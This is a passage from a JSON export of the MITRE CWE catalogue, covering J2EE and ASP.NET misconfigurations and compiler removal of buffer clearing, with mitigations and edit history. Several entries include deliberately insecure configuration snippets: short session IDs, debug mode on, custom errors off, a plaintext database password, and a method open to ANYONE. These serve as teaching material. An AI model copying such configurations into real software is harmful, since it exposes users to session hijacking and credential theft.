site, assume that the attacker can try 1,000 guesses per second and that there are 10,000 valid session identifiers at any given moment. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is less than 4 minutes. Now assume a 128 bit session identifier that provides 64 bits of entropy. With a very large web site, an attacker might try 10,000 guesses per second with 100,000 valid session identifiers available to be guessed. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is greater than 292 years."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-47"},"Intro_Text":"The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<sun-web-app></sun-web-app>","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...<session-config></session-config>...","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<session-properties></session-properties>","xhtml:div":{"#text":"<property name=\\"idLengthBytes\\" value=\\"8\\"></property>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<description>The number of bytes in this web module\'s session ID.</description>","attr":{"@_style":"margin-left:10px;"}}}}}}}}},"Body_Text":["This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user\'s session.","Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Insufficient Session-ID Length"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"59"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-482"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Common_Consequences, Enabling_Factors_for_Exploitation, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"7":{"attr":{"@_ID":"7","@_Name":"J2EE Misconfiguration: Missing Custom Error Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The default error page of a web application should not display sensitive information about the software system.","Extended_Description":{"xhtml:p":["A Web application must define a default error page for 4xx errors (e.g. 404), 5xx (e.g. 500) errors and catch java.lang.Throwable exceptions to prevent attackers from mining information from the application container\'s built-in error response.","When an attacker explores a web site looking for vulnerabilities, the amount of information that the site provides is crucial to the eventual success or failure of any attempted attacks."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"756","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"A stack trace might show the attacker a malformed SQL query string, the type of database being used, and the version of the application container. This information enables the attacker to target known vulnerabilities in these components."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Handle exceptions appropriately in source code."},{"Phase":["Implementation","System Configuration"],"Description":"Always define appropriate error pages. The application configuration should specify a default error page in order to guarantee that the application will never leak error messages to an attacker. Handling standard HTTP error codes is useful and user-friendly in addition to being a good security practice, and a good configuration will also define a last-chance error handler that catches any exception that could possibly be thrown by the application."},{"Phase":"Implementation","Description":"Do not attempt to process an error or attempt to mask it."},{"Phase":"Implementation","Description":"Verify return values are correct and do not supply sensitive information about the system."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-76"},"Intro_Text":"In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"try {} catch (ApplicationSpecificException ase) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"Caught: \\" + ase.toString());","attr":{"@_style":"margin-left:10px;"}}]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Missing Error Handling"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-65"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Missing Error Handling","attr":{"@_Date":"2009-03-10"}}}},"8":{"attr":{"@_ID":"8","@_Name":"J2EE Misconfiguration: Entity Bean Declared Remote","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"When an application exposes a remote interface for an entity bean, it might also expose methods that get or set the bean\'s data. These methods could be leveraged to read sensitive information, or to change data in ways that violate the application\'s expectations, potentially leading to other vulnerabilities.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Declare Java beans \\"local\\" when possible. When a bean must be remotely accessible, make sure that sensitive information is not exposed, and ensure that the application logic performs appropriate validation of any data that might be modified by an attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<ejb-jar></ejb-jar>","xhtml:div":{"#text":"<enterprise-beans></enterprise-beans>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<entity></entity>...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<ejb-name>EmployeeRecord</ejb-name><home>com.wombat.empl.EmployeeRecordHome</home><remote>com.wombat.empl.EmployeeRecord</remote>...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":""}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Unsafe Bean Declaration"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"Entity beans that expose a remote interface become part of an application\'s attack surface. For performance reasons, an application should rarely use remote entity beans, so there is a good chance that a remote entity bean declaration is an error.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"9":{"attr":{"@_ID":"9","@_Name":"J2EE Misconfiguration: Weak Access Permissions for EJB Methods","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the software system.","Extended_Description":"If the EJB deployment descriptor contains one or more method permissions that grant access to the special ANYONE role, it indicates that access control for the application has not been fully thought through or that the application is structured in such a way that reasonable access control restrictions are impossible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Follow the principle of least privilege when assigning access rights to EJB methods. Permission to invoke EJB methods should not be granted to the ANYONE role."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following deployment descriptor grants ANYONE permission to invoke the Employee EJB\'s method named getSalary().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<ejb-jar></ejb-jar>","xhtml:div":{"#text":"...<assembly-descriptor></assembly-descriptor>...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"<method-permission></method-permission>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<role-name>ANYONE</role-name><method><ejb-name>Employee</ejb-name><method-name>getSalary</method-name>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Weak Access Permissions"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Weak Access Permissions","attr":{"@_Date":"2008-04-11"}}}},"11":{"attr":{"@_ID":"11","@_Name":"ASP.NET Misconfiguration: Creating Debug Binary","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Debugging messages help attackers learn about the system and plan a form of attack.","Extended_Description":"ASP .NET applications can be configured to produce debug binaries. These binaries give detailed debugging messages and should not be used in production environments. Debug binaries are meant to be used in a development or testing environment and can pose a security risk if they are deployed to production.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"489","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The debug attribute of the <compilation> tag defines whether compiled binaries should include debugging information. The use of debug binaries causes an application to provide as much information about itself as possible to the user."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Build and Compilation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Attackers can leverage the additional information they gain from debugging output to mount attacks targeted on the framework, database, or other resources used by the application."}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Avoid releasing debug binaries into the production environment. Change the debug mode to false when the application is deployed into production."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The file web.config contains the debug mode setting. Setting debug to \\"true\\" will let the browser display debugging information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<?xml version=\\"1.0\\" encoding=\\"utf-8\\" ?><configuration></configuration>","xhtml:br":"","xhtml:div":{"#text":"<system.web></system.web>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<compilationdefaultLanguage=\\"c#\\"debug=\\"true\\"/>...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}}},"Body_Text":"Change the debug mode to false when the application is deployed into production."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"ASP.NET Misconfiguration: Creating Debug Binary"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Time_of_Introduction"}]}},"12":{"attr":{"@_ID":"12","@_Name":"ASP.NET Misconfiguration: Missing Custom Error Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An ASP .NET application must enable custom error pages in order to prevent attackers from mining information from the framework\'s built-in responses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"756","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The mode attribute of the <customErrors> tag defines whether custom or default error pages are used."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Default error pages gives detailed information about the error that occurred, and should not be used in production environments. Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"System Configuration","Description":"Handle exceptions appropriately in source code. ASP .NET applications should be configured to use custom error pages instead of the framework default page."},{"Phase":"Architecture and Design","Description":"Do not attempt to process an error or attempt to mask it."},{"Phase":"Implementation","Description":"Verify return values are correct and do not supply sensitive information about the system."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-75"},"Intro_Text":"The mode attribute of the <customErrors> tag in the Web.config file defines whether custom or default error pages are used.","Body_Text":["In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned.","A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned.","Another secure option is to set the mode attribute of the <customErrors> tag to use a custom page as follows:"],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":"<customErrors mode=\\"Off\\" />"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"<customErrors mode=\\"RemoteOnly\\" />"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"<customErrors mode=\\"On\\" defaultRedirect=\\"YourErrorPage.htm\\" />"}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"ASP.NET Misconfiguration: Missing Custom Error Handling"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-65"}},{"attr":{"@_External_Reference_ID":"REF-66"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Background_Details, Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"ASP.NET Misconfiguration: Missing Custom Error Handling","attr":{"@_Date":"2009-03-10"}}}},"13":{"attr":{"@_ID":"13","@_Name":"ASP.NET Misconfiguration: Password in Configuration File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"260","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Credentials stored in configuration files should be encrypted, Use standard APIs and industry accepted algorithms to encrypt the credentials stored in configuration files."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database, but the pair is stored in plaintext.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...<connectionStrings></connectionStrings>...","xhtml:br":["",""],"xhtml:div":{"#text":"<add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" />","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"Username and password information should not be included in a configuration file or a properties file in plaintext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"ASP.NET Misconfiguration: Password in Configuration File"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-103"}},{"attr":{"@_External_Reference_ID":"REF-104"}},{"attr":{"@_External_Reference_ID":"REF-105"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"14":{"attr":{"@_ID":"14","@_Name":"Compiler Removal of Code to Clear Buffers","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka \\"dead store removal.\\"","Extended_Description":{"xhtml:p":"This compiler optimization error occurs when:","xhtml:ul":{"xhtml:li":["1. Secret data are stored in memory.","2. The secret data are scrubbed from memory by overwriting its contents.","3. The source code is compiled using an optimizing compiler, which identifies and removes the function that overwrites the contents as a dead store because the memory is not used subsequently."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"733","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Build and Compilation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Memory","Bypass Protection Mechanism"],"Note":"This weakness will allow data that has not been cleared from memory to be read. If this data contains sensitive password information, then an attacker can read the password and use the information to bypass protection mechanisms."}},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others."},{"Method":"White 